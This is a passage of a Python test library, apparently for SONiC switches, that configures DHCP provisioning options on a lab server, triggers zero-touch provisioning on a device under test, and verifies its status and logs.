    for attempt in range(1, iteration + 2):
        response = show_ztp_status(dut, cli_type=cli_type)
        if "adminmode" in response and response["adminmode"] != "True":
            st.log("Enabling ZTP ...")
            ztp_operations(dut, "enable")
            break
        if attempt > iteration:
            st.log("ZTP admin mode not found after max iterations ...")
            break
        st.wait(delay)
    # Phase 2: poll until admin mode reads back as enabled.
    for attempt in range(1, iteration + 2):
        response = show_ztp_status(dut, cli_type=cli_type)
        if "adminmode" in response and response["adminmode"] == "True":
            st.log("Admin mode enabled at {} iteration".format(attempt))
            return True
        if attempt > iteration:
            st.log("Max iteration {} count reached ".format(attempt))
            return False
        st.wait(delay)
def ztp_operations(dut, operation, cli_type="", max_time=0):
    """
    Author: Chaitanya Vella (chaitanya-vella.kumar@broadcom.com)
    API to do ZTP operations
    :param dut:
    :param operation: one of "run", "enable", "disable"
    :param cli_type: UI flavor; only "click" and "klish" are supported here
    :param max_time: passed through to st.config
    :return: False when the operation/cli_type is unsupported, else None
    """
    cli_type = st.get_ui_type(dut, cli_type=cli_type)
    if cli_type == "click":
        supported_opers = ["run", "enable", "disable"]
        if operation not in supported_opers:
            return False
        # "run"/"disable" prompt for confirmation, hence -y.
        if operation in ["run", "disable"]:
            command = "ztp {} -y".format(operation)
        else:
            command = "ztp {}".format(operation)
    elif cli_type == "klish":
        # klish exposes only enable/disable via [no] ztp enable.
        no_form = "no" if operation == "disable" else ""
        command = "{} ztp enable".format(no_form)
    else:
        # Bug fix: previously an unsupported cli_type fell through with
        # 'command' unbound and crashed with NameError at st.config.
        st.log("Unsupported cli_type {} for ztp operation".format(cli_type))
        return False
    st.config(dut, command, type=cli_type, max_time=max_time)
def ztp_push_full_config(dut, cli_type=""):
    """
    NOT USED ANYWHERE
    Author: Chaitanya Vella (chaitanya-vella.kumar@broadcom.com)
    API to push full config

    Stages the DUT's current running config as a ZTP "config_db.json" plugin:
    uploads a plugin descriptor to /etc/sonic/ztp/ pointing at a local file://
    copy of the running config, runs "ztp run", then samples the status twice.
    :param dut:
    :return:
    """
    cli_type = st.get_ui_type(dut, cli_type=cli_type)
    config_dbjson = "config_db.json"
    config_file = "ztp_data_local.json"
    plugin_file_path = "/etc/sonic/ztp/{}".format(config_file)
    source = "/tmp/{}".format(config_dbjson)
    # Descriptor tells ZTP to fetch config_db.json from the local file URL
    # (300s timeout) and persist it via save-config.
    plugin_json = {config_dbjson: {"url": {"source": "file://{}".format(source),
                                           "timeout": 300}, "save-config": "true"}}
    file_path = basic_obj.write_to_json_file(plugin_json)
    st.upload_file_to_dut(dut, file_path, plugin_file_path)
    running_config = switch_conf_obj.get_running_config(dut)
    file_path = basic_obj.write_to_json_file(running_config)
    st.upload_file_to_dut(dut, file_path, source)
    # wait_5 / wait_60 / wait_10 are module-level wait constants defined
    # elsewhere in this file -- presumably seconds; TODO confirm.
    st.wait(wait_5)
    ztp_operations(dut, "run")
    st.wait(wait_60)
    show_ztp_status(dut, cli_type=cli_type)
    st.wait(wait_10)
    show_ztp_status(dut, cli_type=cli_type)
def prepare_and_write_option_67_config_string(ssh_conn_obj, static_ip, config_path, config_file, dhcp_config_file, type="http"):
    """
    NOT USED ANYWHERE
    Author: Chaitanya Vella (chaitanya-vella.kumar@broadcom.com)
    Common function to write option 67 to DHCP server
    :param ssh_conn_obj: SSH connection to the DHCP server
    :param static_ip: server IP used to build the bootfile URL
    :param config_path: path component of the URL
    :param config_file: file name component of the URL
    :param dhcp_config_file: dhcpd config file to update
    :param type: URL scheme - "http", "tftp" or "ftp"
    :raises ValueError: if type is not one of the supported schemes
    :return:
    """
    option_67_config = "option bootfile-name"
    # Note: the http template has no slash between host and path because
    # config_path is expected to start with "/".
    url_formats = {
        "http": "http://{}{}/{}",
        "tftp": "tftp://{}/{}/{}",
        "ftp": "ftp://{}/{}/{}",
    }
    if type not in url_formats:
        # Bug fix: an unsupported scheme previously crashed with NameError
        # on the unbound config_json_url; fail with a clear error instead.
        raise ValueError("Unsupported URL scheme for option 67: {}".format(type))
    config_json_url = url_formats[type].format(static_ip, config_path, config_file)
    option_67_config_string = '{} "{}";'.format(option_67_config, config_json_url)
    if not basic_obj.write_update_file(ssh_conn_obj, option_67_config,
                                      option_67_config_string, dhcp_config_file):
        st.log("Written content in file {} not found".format(dhcp_config_file))
        st.report_fail("content_not_found")
def write_option_67_to_dhcp_server(ssh_conn_obj, data):
    """
    NOT USED ANYWHERE
    Writes the DHCP option 67 (bootfile-name) line to the server config and
    restarts the DHCP service, verifying it comes back up.
    :param ssh_conn_obj: SSH connection to the DHCP server
    :param data: object with type, static_ip, config_path, config_file,
                 dhcp_config_file, dhcp_service_name, action, device, dhcpd_pid
    :raises ValueError: if data.type is not http/tftp/ftp
    :return:
    """
    option_67_config = "option bootfile-name"
    url_formats = {
        "http": "http://{}{}/{}",
        "tftp": "tftp://{}/{}/{}",
        "ftp": "ftp://{}/{}/{}",
    }
    if data.type not in url_formats:
        # Bug fix: an unsupported scheme previously crashed with NameError
        # on the unbound config_json_url; fail with a clear error instead.
        raise ValueError("Unsupported URL scheme for option 67: {}".format(data.type))
    config_json_url = url_formats[data.type].format(data.static_ip, data.config_path, data.config_file)
    option_67_config_string = '{} "{}";'.format(option_67_config, config_json_url)
    if not basic_obj.write_update_file(ssh_conn_obj, option_67_config,
                                      option_67_config_string, data.dhcp_config_file):
        st.log("Written content in file {} not found".format(data.dhcp_config_file))
        st.report_fail("content_not_found")
    basic_obj.service_operations(ssh_conn_obj, data.dhcp_service_name, data.action, data.device)
    if not verify_dhcpd_service_status(ssh_conn_obj, data.dhcpd_pid):
        st.log("{} service not running".format(data.dhcp_service_name))
        st.report_fail("service_not_running", data.dhcp_service_name)
def config_and_verify_dhcp_option(ssh_conn_obj, dut, ztp_params, data, expect_reboot=False, reboot_on_success=list(), cli_type=""):
    """
    Common function to configure DHCP option along with status / logs verification
    Author: Chaitanya Vella (chaitanya-vella.kumar@broadcom.com)
    :param ssh_conn_obj:
    :param dut:
    :param ztp_params:
    :param data:
    :return:
    """
    # End-to-end ZTP flow: stage the plugin JSON on the DHCP server, configure
    # option 67 (bootfile URL), restart dhcpd, kick the DUT (reboot or "ztp run"),
    # then verify ZTP status and the per-file log messages.
    cli_type = st.get_ui_type(dut,cli_type=cli_type)
    # REST flavors drive ZTP via klish commands.
    cli_type = "klish" if cli_type in ["rest-put", "rest-patch"] else cli_type
    retry_count = data.retry_count if "retry_count" in data and data.retry_count else 0
    iteration = data.iteration if "iteration" in data and data.iteration else 300
    delay = data.delay if "delay" in data and data.delay else 3
    if "func_name" in data:
        # Destination names for the syslog copies captured on failure.
        syslog_file_names = ["syslog_1_{}".format(data.func_name), "syslog_{}".format(data.func_name)]
    # basic_obj.copy_config_db_to_temp(dut, data.config_db_path, data.config_db_temp)
    # Stage the ZTP payload: raw text, end-of-life marker (no file), or JSON.
    if "config_file_type" in data and data.config_file_type == "text":
        file_path = "/tmp/file_temp.json"
        basic_obj.write_to_file(ssh_conn_obj, data.json_content, file_path, device="server")
    elif "config_file_type" in data and data.config_file_type == "EoL":
        file_path = ""
    else:
        file_path = basic_obj.write_to_json_file(data.json_content)
    if file_path:
        destination_path = "{}{}/{}".format(ztp_params.home_path, ztp_params.config_path, data.config_file)
        basic_obj.copy_file_from_client_to_server(ssh_conn_obj, src_path=file_path, dst_path=destination_path)
    # Optionally also serve the DUT's config_db.json from the server.
    if "config_db_location" in data and data.config_db_location == "json":
        st.download_file_from_dut(dut, data.config_db_temp, file_path)
        destination_path = "{}{}/{}".format(ztp_params.home_path, ztp_params.config_path, data.config_db_file_name)
        basic_obj.copy_file_from_client_to_server(ssh_conn_obj, src_path=file_path, dst_path=destination_path)
    # Negative scenario: corrupt the staged file so JSON parsing fails on the DUT.
    if "scenario" in data and data.scenario == "invalid-json":
        st.log("Writing invalid content to make invalid json ...")
        basic_obj.write_to_file_to_line(ssh_conn_obj, ",", 5, destination_path, "server")
    if data.option_type == "67":
        st.log("Creating {} file on DHCP server ...".format(data.config_file))
        data.search_pattern = r'\s*option\s+bootfile-name\s*\S*\s*"\S+";'
        data.option_string = "option bootfile-name"
        if data.type == "http":
            data.option_url = "http://{}{}/{}".format(data.static_ip, data.config_path, data.config_file)
        elif data.type == "tftp":
            data.option_url = "tftp://{}/{}/{}".format(data.static_ip, data.config_path, data.config_file)
        elif data.type == "ftp":
            data.option_url = "ftp://{}/{}/{}".format(data.static_ip, data.config_path, data.config_file)
        write_option_to_dhcp_server(ssh_conn_obj, data)
        basic_obj.service_operations(ssh_conn_obj, data.dhcp_service_name, data.action, data.device)
        if not verify_dhcpd_service_status(ssh_conn_obj, data.dhcpd_pid):
            st.log("{} service not running".format(data.dhcp_service_name))
            st.report_fail("service_not_running", data.dhcp_service_name)
        # write_option_67_to_dhcp_server(ssh_conn_obj, data)
    # klish cannot issue "ztp run"; force the reboot path instead.
    data.device_action = "reboot" if cli_type == "klish" else data.device_action
    if data.device_action == "reboot":
        reboot_type = data.reboot_type if "reboot_type" in data and data.reboot_type else "normal"
        # Removing config_db.json makes the DUT boot into ZTP discovery.
        basic_obj.remove_file(dut, data.config_db_path)
        st.reboot(dut, reboot_type, skip_port_wait=True)
        st.wait_system_status(dut, 500)
    elif data.device_action == "run":
        ztp_operations(dut, data.device_action)
    # In-band testing: make sure the front-panel port carries DHCP, not the OOB port.
    if "band_type" in data and data.band_type=="inband":
        if not basic_obj.poll_for_system_status(dut):
            st.log("Sytem is not ready ..")
            st.report_env_fail("system_not_ready")
        if not basic_obj.check_interface_status(dut, ztp_params.oob_port,"up"):
            basic_obj.ifconfig_operation(dut, ztp_params.oob_port, "down")
        interface_status = basic_obj.check_interface_status(dut, ztp_params.inband_port, "up")
        if interface_status is not None:
            if not interface_status:
                intf_obj.interface_noshutdown(dut, ztp_params.inband_port, cli_type=cli_type)
    # Optional ZTP service bounce to pick up a fresh discovery cycle.
    if "service" in data and data.service == "disable":
        basic_obj.service_operations_by_systemctl(dut, "ztp", "stop")
        if basic_obj.verify_service_status(dut, "ztp"):
            st.log("ZTP status is not stopped")
            st.report_fail("service_not_stopped", "ztp")
        basic_obj.service_operations_by_systemctl(dut, "ztp", "start")
    if not poll_ztp_status(dut, ["IN-PROGRESS", "Not Started", "SUCCESS"], cli_type=cli_type):
        st.report_fail("ztp_max_polling_interval")
    if "check" in data and data.check == "not":
        # Negative check: ZTP success here means the test failed.
        if verify_ztp_status(dut, retry_count, iteration, delay, cli_type=cli_type):
            if "logs_path" in data and "func_name" in data:
                capture_syslogs(dut, data.logs_path, syslog_file_names)
            st.log("ZTP status verification failed")
            st.report_fail("ztp_status_verification_failed")
    else:
        st.log("Iteration count {}".format(iteration))
        st.log("REBOOT ON SUCCESS - {}".format(reboot_on_success))
        if reboot_on_success:
            # configdb-json plugin reboots the DUT on success; ride it out first.
            if "configdb-json" in reboot_on_success:
                st.wait_system_reboot(dut)
                st.wait_system_status(dut, 300)
            result = verify_ztp_status(dut, retry_count, iteration, delay, expect_reboot=expect_reboot, reboot_on_success=reboot_on_success, cli_type=cli_type)
        else:
            result = verify_ztp_status(dut, retry_count, iteration, delay, expect_reboot=expect_reboot, cli_type=cli_type)
        if not result:
            if "logs_path" in data and "func_name" in data:
                capture_syslogs(dut, data.logs_path, syslog_file_names)
            st.log("ZTP status verification failed")
            st.report_fail("ztp_status_verification_failed")
        if reboot_on_success:
            output = show_ztp_status(dut, cli_type=cli_type)
            if output["status"] != "SUCCESS":
                st.wait(300, "Waiting for device to reboot after success...")
                st.wait_system_status(dut, 300)
            # st.wait_system_reboot(dut)
            if not verify_ztp_status(dut, retry_count, iteration, delay, cli_type=cli_type):
                if "logs_path" in data and "func_name" in data:
                    capture_syslogs(dut, data.logs_path, syslog_file_names)
                st.log("ZTP status verification failed")
                st.report_fail("ztp_status_verification_failed")
        st.banner(boot_up_obj.sonic_installer_list(dut))
    verify_ztp_filename_logs(dut, data)
    # Optional extra log-message verification in both syslog generations.
    if "ztp_log_string" in data and data.ztp_log_string:
        if not basic_obj.poll_for_error_logs(dut, data.ztp_log_path, data.ztp_log_string):
            st.log("ZTP log {} verification failed for message {}".format(data.ztp_log_path, data.ztp_log_string))
            if not basic_obj.poll_for_error_logs(dut, data.ztp_log_path_1, data.ztp_log_string):
                st.log("ZTP log {} verification failed for message {}".format(data.ztp_log_path_1, data.ztp_log_string))
                st.report_fail("ztp_log_verification_failed", data.ztp_log_path_1, data.ztp_log_string)
    if "result" in data and data.result == "pass":
        st.report_pass("test_case_passed")
def write_option_239_to_dhcp_server(ssh_conn_obj, data):
    """Comment out option 67 and write option 239 (provision-url) into the DHCP config file."""
    st.log("##################### Writing option 239 to dhcp config file ... ##################")
    config_file = data["dhcp_config_file"]
    url = "http://{}{}/{}".format(data["server_ip"], data["config_path"], data["provision_script"])
    keyword = 'option provision-url ='
    new_line = '{} "{}";'.format(keyword, url)
    # Neutralize any existing option 67 entry so only option 239 is served.
    basic_obj.write_update_file(ssh_conn_obj, "option bootfile-name", "##", config_file)
    if not basic_obj.write_update_file(ssh_conn_obj, keyword, new_line, config_file):
        st.log("Written content in file {} not found".format(config_file))
        st.report_fail("content_not_found")
def write_option_225_to_dhcp_server(ssh_conn_obj, data):
    """Comment out options 67/239 and write option-225 (minigraph URL) into the DHCP config file."""
    config_file = data["dhcp_config_file"]
    # Neutralize the competing options first so only option-225 is served.
    for stale_keyword in ("option bootfile-name", 'option provision-url ='):
        basic_obj.write_update_file(ssh_conn_obj, stale_keyword, "##", config_file)
    keyword = "option option-225 ="
    new_line = '{} "{}";'.format(keyword, data["minigraph_path"])
    if not basic_obj.write_update_file(ssh_conn_obj, keyword, new_line, config_file):
        st.log("Written content in file {} not found".format(config_file))
        st.report_fail("content_not_found")
def config_and_verify_option_225(ssh_conn_obj, dut, ztp_params, data, cli_type=""):
    # Configures DHCP option-225 (minigraph URL) on the server, restarts dhcpd,
    # triggers ZTP on the DUT (reboot or "ztp run") and verifies status/logs.
    cli_type = st.get_ui_type(dut, cli_type=cli_type)
    if data.option_type == "225":
        if "func_name" in data:
            # Destination names for the syslog copies captured on failure.
            syslog_file_names = ["syslog_1_{}".format(data.func_name), "syslog_{}".format(data.func_name)]
        data.search_pattern = r'\s*option option-225\s*\S*\s*"\S+";'
        data.option_string = "option option-225 " # "option dhcp6.boot-file-url "
        data.option_url = data.minigraph_path
        # Remove any lingering option 67 / 239 lines so only option-225 is served.
        # (data.option_type is reused as a scratch field for the clear helper.)
        data.option_type = "option_67"
        clear_options_from_dhcp_server(ssh_conn_obj, data)
        data.option_type = "option_239"
        clear_options_from_dhcp_server(ssh_conn_obj, data)
        write_option_to_dhcp_server(ssh_conn_obj, data)
        # write_option_225_to_dhcp_server(ssh_conn_obj, data)
        basic_obj.service_operations(ssh_conn_obj, data.dhcp_service_name, data.action, data.device)
        if not verify_dhcpd_service_status(ssh_conn_obj, data.dhcpd_pid):
            st.log("{} service not running".format(data.dhcp_service_name))
            st.report_fail("service_not_running", data.dhcp_service_name)
        # klish cannot issue "ztp run"; force the reboot path instead.
        data.device_action = "reboot" if cli_type == "klish" else data.device_action
        if data.device_action == "reboot":
            reboot_type = data.reboot_type if "reboot_type" in data and data.reboot_type else "normal"
            # Removing config_db.json makes the DUT boot into ZTP discovery.
            basic_obj.remove_file(dut, data.config_db_path)
            st.reboot(dut, reboot_type, skip_port_wait=True)
            st.wait_system_status(dut, 400)
        elif data.device_action == "run":
            ztp_operations(dut, data.device_action)
        if not verify_ztp_status(dut, cli_type=cli_type):
            if "logs_path" in data and "func_name" in data:
                capture_syslogs(dut, data.logs_path, syslog_file_names)
            st.log("ZTP status verification failed")
            st.report_fail("ztp_status_verification_failed")
        verify_ztp_filename_logs(dut, data)
        # Optional extra log-message verification in both syslog generations.
        if "ztp_log_string" in data and data.ztp_log_string:
            if not basic_obj.poll_for_error_logs(dut, data.ztp_log_path, data.ztp_log_string):
                st.log("ZTP log {} verification failed for message {}".format(data.ztp_log_path, data.ztp_log_string))
                if not basic_obj.poll_for_error_logs(dut, data.ztp_log_path_1, data.ztp_log_string):
                    st.log("ZTP log {} verification failed for message {}".format(data.ztp_log_path_1,
                                                                                 data.ztp_log_string))
                    st.report_fail("ztp_log_verification_failed", data.ztp_log_path_1, data.ztp_log_string)
def verify_ztp_attributes(dut, property, value, cli_type=""):
    """
    This is to verify the ztp attributes with the provided value
    Author: Chaitanya Vella (chaitanya.vella-kumar@broadcom.com)
    :param dut: dut object
    :param property: status, service, adminmode, filenames, timestamp, source
    :param value: This is string except filenames, for file names {'03-test-plugin': 'Not Started', '02-test-plugin':
     'Not Started', 'configdb-json': 'Not Started'}
    :return: boolean
    """
    cli_type = st.get_ui_type(dut, cli_type=cli_type)
    response = show_ztp_status(dut, cli_type=cli_type)
    if not response:
        return False
    if property not in response:
        return False
    if property == "filenames":
        # "filenames" is a one-element list holding a {filename: status} dict.
        filenames = response["filenames"][0]
        # Bug fix: iterate with .items(); iterating the dict directly yields
        # only keys and the two-name unpack raised ValueError at runtime.
        for filename, status in filenames.items():
            if value[filename] != status:
                return False
        return True
    return response[property] == value
def verify_ztp_filename_logs(dut, data, status="SUCCESS", condition="positive"):
    """
    Author: Chaitanya Vella (chaitanya-vella.kumar@broadcom.com)
    API to verify logs
    :param dut:
    :param data:
    :param status:
    :return:
    """
    # For each plugin file name, builds the expected log line (default
    # "Checking configuration section <file> result: <status>") and polls the
    # primary ZTP log, falling back to the secondary log before failing.
    filenames = list([str(e) for e in data.file_names]) if isinstance(data.file_names, list) else [data.file_names]
    log_msg = data.log_msg if "log_msg" in data and data.log_msg else "Checking configuration section {} result: {}"
    match = data.match if "match" in data else ""
    for file_name in filenames:
        log_string_1 = log_msg.format(file_name, status)
        st.log(log_string_1)
        if not basic_obj.poll_for_error_logs(dut, data.ztp_log_path, log_string_1, match=match):
            if condition == "positive":
                # Primary log missed the message; try the secondary log and
                # fail the test if it is absent there as well.
                st.log("ZTP log {} verification failed for message {}".format(data.ztp_log_path, log_string_1))
                if not basic_obj.poll_for_error_logs(dut, data.ztp_log_path_1, log_string_1, match=match):
                    st.log("ZTP log {} verification failed for message {}".format(data.ztp_log_path_1,
                                                                                 log_string_1))
                    st.report_fail("ztp_log_verification_failed", data.ztp_log_path_1, log_string_1)
            else:
                # Non-"positive" condition: absence of the message is success.
                return True
        else:
            # NOTE(review): returns True after the FIRST filename found in the
            # log, so any remaining filenames are never checked. Looks
            # unintentional for multi-file verification -- confirm.
            return True
def config_ztp_backdoor_options(dut, ztp_cfg=None, dut_ztp_cfg_file="/host/ztp/ztp_cfg.json"):
    """
    Author: Chaitanya Vella (chaitanya-vella.kumar@broadcom.com)
    Function to enable backward options for ZTP
    :param dut:
    :param ztp_cfg: dict written to the ZTP config file; defaults to
                    {"admin-mode": True, "restart-ztp-interval": 30}
    :param dut_ztp_cfg_file: destination path of the config file on the DUT
    :return:
    """
    # Fix: the default used to be a shared mutable dict (a classic Python
    # pitfall); a None sentinel with the same effective value is safer.
    if ztp_cfg is None:
        ztp_cfg = {"admin-mode": True, "restart-ztp-interval": 30}
    ztp_cfg_file = basic_obj.write_to_json_file(ztp_cfg)
    st.upload_file_to_dut(dut, ztp_cfg_file, dut_ztp_cfg_file)
def ztp_status_verbose(dut, cli_type=""):
    """
    API to get the ztp status verbose output with filename and its details as we are getting the status in ztp status API
    Author: Chaitanya Vella (chaitanya-vella.kumar@broadcom.com)
    :param dut:
    :return: parsed "ztp status -v" output on click, otherwise the
             regular show_ztp_status() result
    """
    cli_type = st.get_ui_type(dut, cli_type=cli_type)
    if cli_type == "click":
        return st.show(dut, "sudo ztp status -v", type=cli_type)
    return show_ztp_status(dut, cli_type=cli_type)
def verify_plugin_chronological_order(dut, cli_type=""):
    cli_type = st.get_ui_type(dut, cli_type=cli_type)
    """
    API to verify the plugin chronological order of ztp status
    Author: Chaitanya Vella (chaitanya-vella.kumar@broadcom.com)
    :param dut:
    :return:
    """
    # Collects per-plugin timestamps from the verbose ztp status output and
    # checks each adjacent pair for a non-negative time delta.
    st.log("Verifying timestamp for chronological order ... ")
    output = ztp_status_verbose(dut, cli_type=cli_type)
    data = list()
    if cli_type == "click":
        for val in output:
            data.append(val["filetimestamp"])
    else:
        for val in output["timestamps"]:
            for _, timestamp in val.items():
                data.append(timestamp)
    # NOTE(review): the timestamps are lexicographically sorted before the
    # delta check below, so the check validates the sorted list rather than
    # the order reported by ZTP -- presumably intentional only if the string
    # format sorts chronologically; confirm utils_obj.date_time_delta semantics.
    data.sort()
    for i, _ in enumerate(data):
        if i + 1 < len(data):
            result = utils_obj.date_time_delta(data[i], data[i + 1], True)
            st.log(result)
            if result[0] < 0 or result[1] < 0:
                st.log("Observed timestamp difference is not as expected ...")
                return False
    return True
def verify_dhclient_on_interface(dut, search_string, interface, expected_count=2):
    """
    API to verify DHCLIENT on provided interface using ps aux command
    Author: Chaitanya Vella (chaitanya-vella.kumar@broadcom.com)
    :param dut:
    :param search_string: pattern passed to ps aux filtering
    :param interface: interface whose dhclient pid file is expected
    :param expected_count: retained for compatibility (count is only logged)
    :return: True when a dhclient process for the interface is found
    """
    st.log("Verifying dhclient for {} interface".format(interface))
    processes = basic_obj.get_ps_aux(dut, search_string)
    st.log("Observed {} DHCLIENT entries on {} interface".format(len(processes), interface))
    if not processes:
        st.error("DHCLIENT process not found on DUT ...")
        return False
    pid_marker = "/run/dhclient.{}.pid".format(interface)
    # A matching pid-file path in the command line identifies the interface's client.
    for entry in processes:
        if pid_marker in entry["command"]:
            st.log("Required dhclient is found ...")
            return True
    return False
def create_required_folders(conn_obj, path_list):
    """
    API to create folders as per the provided path in bulk
    :param conn_obj: connection object to the server
    :param path_list: a single path string or a list of paths to create
    :return: None
    """
    # Idiom fix: isinstance() instead of type(...) is str.
    paths = [path_list] if isinstance(path_list, str) else [str(p) for p in path_list]
    for path in paths:
        basic_obj.make_dir(conn_obj, path, "server")
        # World-writable so the DHCP/HTTP/TFTP services can serve staged files.
        basic_obj.change_permissions(conn_obj, path, 777, "server")
def config_dhcpv6_options(ssh_conn_obj, ztp_params, config_params, options=dict(), cli_type=""):
    """
    Common function to configure dhcpv6 options and verify the result on both inband and out of band interfaces
    :param ssh_conn_obj:
    :param ztp_params:
    :param config_params:
    :param options:
    :return:
    """
    # Stages the ZTP JSON on the server, writes DHCPv6 option 59 (boot-file-url),
    # restarts the v6 DHCP service, triggers ZTP on the DUT and verifies
    # status/logs; options may request reboot_on_success / expect_reboot handling.
    cli_type = st.get_ui_type(config_params.dut, cli_type=cli_type)
    retry_count = config_params.retry_count if "retry_count" in config_params and config_params.retry_count else 0
    iteration = config_params.iteration if "iteration" in config_params and config_params.iteration else 300
    delay = config_params.delay if "delay" in config_params and config_params.delay else 3
    expect_reboot = True if "expect_reboot" in options and options ["expect_reboot"] else False
    st.log(config_params)
    if "func_name" in config_params:
        # Destination names for the syslog copies captured on failure.
        syslog_file_names = ["syslog_1_{}".format(config_params.func_name), "syslog_{}".format(config_params.func_name)]
    if "json_content" in config_params:
        file_path = basic_obj.write_to_json_file(config_params.json_content)
        st.log(file_path)
        if file_path:
            destination_path = "{}{}/{}".format(config_params.home_path, ztp_params.config_path, config_params.ztp_file)
            st.log(destination_path)
            basic_obj.copy_file_from_client_to_server(ssh_conn_obj, src_path=file_path, dst_path=destination_path)
    # IPv6 literal host must be bracketed in the URL.
    config_params.option_59_url = "http://[{}]{}/{}".format(config_params.static_ip, ztp_params.config_path, config_params.ztp_file)
    config_params.search_pattern = r'\s*option\s+dhcp6.boot-file-url\s+"\S+";'
    write_option_59_to_dhcp_server(ssh_conn_obj, config_params)
    basic_obj.service_operations(ssh_conn_obj, config_params.dhcp6_service_name, "restart", "server")
    if not verify_dhcpd_service_status(ssh_conn_obj, config_params.dhcpd6_pid):
        st.log("{} service is running which is not expected".format(config_params.dhcp6_service_name))
        st.report_fail("service_running_not_expected", config_params.dhcp6_service_name)
    reboot_type = config_params.reboot_type if "reboot_type" in config_params and config_params.reboot_type else "normal"
    if "ztp_operation" in config_params:
        # klish cannot issue "ztp run"; force the reboot path instead.
        config_params.ztp_operation = "reboot" if cli_type == "klish" else config_params.ztp_operation
        if config_params.ztp_operation == "reboot":
            # Removing config_db.json makes the DUT boot into ZTP discovery.
            basic_obj.remove_file(config_params.dut, config_params.config_db_path)
            st.reboot(config_params.dut, reboot_type, skip_port_wait=True)
        elif config_params.ztp_operation == "run":
            ztp_operations(config_params.dut, config_params.ztp_operation)
    else:
        st.log("ZTP operation is not mentioned hence rebooting the device ...")
        basic_obj.remove_file(config_params.dut, config_params.config_db_path)
        st.reboot(config_params.dut, reboot_type, skip_port_wait=True)
    if "reboot_on_success" in options and options["reboot_on_success"]:
        result = verify_ztp_status(config_params.dut, retry_count, iteration, delay, expect_reboot=expect_reboot, reboot_on_success=options["reboot_on_success"], cli_type=cli_type)
    else:
        result = verify_ztp_status(config_params.dut, retry_count, iteration, delay, expect_reboot=expect_reboot, cli_type=cli_type)
    if not result:
        if "logs_path" in config_params and "func_name" in config_params:
            capture_syslogs(config_params.dut, config_params.logs_path, syslog_file_names)
        st.log("ZTP status verification failed")
        st.report_fail("ztp_status_verification_failed")
    if "reboot_on_success" in options and options["reboot_on_success"]:
        # After the success-triggered reboot, reload config and re-verify.
        reboot_obj.config_reload(config_params.dut)
        st.wait(5)
        if not ip_obj.ping(config_params.dut, config_params.static_ip, family="ipv6"):
            st.log("Pinging to DHCP server failed from DUT, issue either with DUT or server")
            # intf_obj.enable_dhcp_on_interface(config_params.dut, config_params.network_port, "v6")
        if not verify_ztp_status(config_params.dut, retry_count, iteration, delay, cli_type=cli_type):
            if "logs_path" in config_params and "func_name" in config_params:
                capture_syslogs(config_params.dut, config_params.logs_path, syslog_file_names)
            st.log("ZTP status verification failed")
            st.report_fail("ztp_status_verification_failed")
    verify_ztp_filename_logs(config_params.dut, config_params)
    # Optional extra log-message verification in both syslog generations.
    if "ztp_log_string" in config_params and config_params.ztp_log_string:
        if not basic_obj.poll_for_error_logs(config_params.dut, config_params.ztp_log_path, config_params.ztp_log_string):
            st.log("ZTP log {} verification failed for message {}".format(config_params.ztp_log_path, config_params.ztp_log_string))
            if not basic_obj.poll_for_error_logs(config_params.dut, config_params.ztp_log_path_1, config_params.ztp_log_string):
                st.log("ZTP log {} verification failed for message {}".format(config_params.ztp_log_path_1, config_params.ztp_log_string))
                st.report_fail("ztp_log_verification_failed", config_params.ztp_log_path_1, config_params.ztp_log_string)
    if "result" in config_params and config_params.result == "pass":
        st.report_pass("test_case_passed")
def write_option_59_to_dhcp_server(connection_obj, data):
    """
    API to add option 59 in DHCP config file.
    :param connection_obj:
    :param data:
    :return:
    """
    # Replaces any existing dhcp6.boot-file-url line with one pointing at
    # data["option_59_url"], then re-scans to confirm the write landed.
    line_number = basic_obj.get_file_number_with_regex(connection_obj, data.search_pattern, data.dhcp_config_file)
    option_59 = "option dhcp6.boot-file-url "
    option_59_path = data["option_59_url"]
    # The outer single quotes wrap the line for the remote shell echo/append.
    option_59_config = "'{} \"{}\";'".format(option_59, option_59_path)
    # NOTE(review): this uses >= 0 while the sibling write_option_to_dhcp_server
    # uses > 0 for the same helper's return value -- confirm which sentinel
    # get_file_number_with_regex returns when the pattern is absent.
    if line_number >= 0:
        basic_obj.delete_line_using_line_number(connection_obj, line_number, data.dhcp_config_file)
    basic_obj.write_to_file(connection_obj, option_59_config, data.dhcp_config_file, device="server")
    # else:
    # basic_obj.delete_line_using_line_number(connection_obj, line_number, data.dhcp_config_file)
    # basic_obj.write_to_file_to_line(connection_obj, option_59_config, line_number, data.dhcp_config_file, device="server")
    # Verify the option is now present in the config file.
    line_number = basic_obj.get_file_number_with_regex(connection_obj, data.search_pattern, data.dhcp_config_file)
    if line_number <=0:
        st.log("Written content in file {} not found".format(data["dhcp_config_file"]))
        st.report_fail("content_not_found")
def write_option_to_dhcp_server(connection_obj, data):
    """
    Common API to write matched line with new one
    :param connection_obj:
    :param data:
    :return:
    """
    # Generic option writer: deletes the line matching data.search_pattern
    # (if present), appends '<option_string> "<option_url>";' and re-scans to
    # confirm the new line is in the config file.
    line_number = basic_obj.get_file_number_with_regex(connection_obj, data.search_pattern, data.dhcp_config_file)
    option = data.option_string # "option dhcp6.boot-file-url "
    option_path = data.option_url
    st.log("#####LINE NUMBER{}".format(line_number))
    # The outer single quotes wrap the line for the remote shell echo/append.
    option_config = "'{} \"{}\";'".format(option, option_path)
    if int(line_number) > 0:
        # line_number = data.line_number if line_number in data else 60
        basic_obj.delete_line_using_line_number(connection_obj, line_number, data.dhcp_config_file)
    basic_obj.write_to_file(connection_obj, option_config, data.dhcp_config_file, device="server")
    # basic_obj.write_to_file_to_line(connection_obj, option_config, line_number, data.dhcp_config_file, device="server")
    # Verify the option is now present in the config file.
    line_number = basic_obj.get_file_number_with_regex(connection_obj, data.search_pattern, data.dhcp_config_file)
    st.log("#####LINE NUMBER{}".format(line_number))
    if line_number <= 0:
        st.log("Written content in file {} not found".format(data["dhcp_config_file"]))
        st.report_fail("content_not_found")
def clear_options_from_dhcp_server(connection_obj, data):
    """Delete a previously configured ZTP option line (67/239/59/225) from the DHCP config file."""
    st.log("Clearing OPTIONS from DHCP server")
    # Map each supported option key to the regex matching its config line.
    patterns = {
        "option_67": r'\s*option\s+bootfile-name\s*\S*\s*"\S+";',
        "option_239": r'\s*option\s+provision-url\s*\S*\s*"\S+";',
        "option_59": r'\s*option\s+dhcp6.boot-file-url\s+"\S+";',
        "option_225": r'\s*option option-225\s*\S*\s*"\S+";',
    }
    option = patterns.get(data.option_type, "") if "option_type" in data else ""
    st.log("OPTION is {}".format(option))
    st.log("CONFIG FILE is {}".format(data.dhcp_config_file))
    if option:
